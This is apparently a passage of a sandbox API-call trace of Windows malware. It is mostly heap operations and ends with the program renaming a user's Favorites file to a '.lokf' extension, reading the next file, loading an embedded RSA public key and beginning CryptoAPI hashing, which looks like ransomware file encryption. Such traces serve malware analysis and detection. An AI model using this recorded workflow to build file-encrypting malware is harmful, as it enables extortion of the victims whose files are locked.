[0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c880e8 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857a0 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85788 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85800 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.658] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85800 | out: hHeap=0x660000) returned 1 [0059.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85800 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85788 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85800 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.659] GetCurrentThreadId () returned 0x9e0 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c841d8 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.659] GetCurrentThreadId () returned 0x9e0 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.659] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85788 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85800 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85818 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85788 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.661] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85818 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85800 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857a0 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c880e8 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.663] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.663] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.663] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.663] WriteFile (in: hFile=0x5cc, lpBuffer=0x32652c0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x32652c0*, lpNumberOfBytesWritten=0x9f4fb14*=0xdd, lpOverlapped=0x0) returned 1 [0059.663] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32652c0 | out: hHeap=0x660000) returned 1 [0059.663] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.663] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.663] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.663] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.663] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.663] CloseHandle (hObject=0x5cc) returned 1 [0059.664] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.lokf")) returned 1 [0059.664] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.664] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.664] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.665] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.665] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0059.665] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.665] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.665] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.665] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.665] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.666] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0059.666] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0059.666] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.666] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.666] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.666] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.666] PathFindFileNameW (pszPath="") returned="" [0059.666] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.667] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.667] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.667] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0059.667] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0059.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.667] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.667] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.669] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.669] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.670] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.670] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0059.671] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.671] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.671] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, 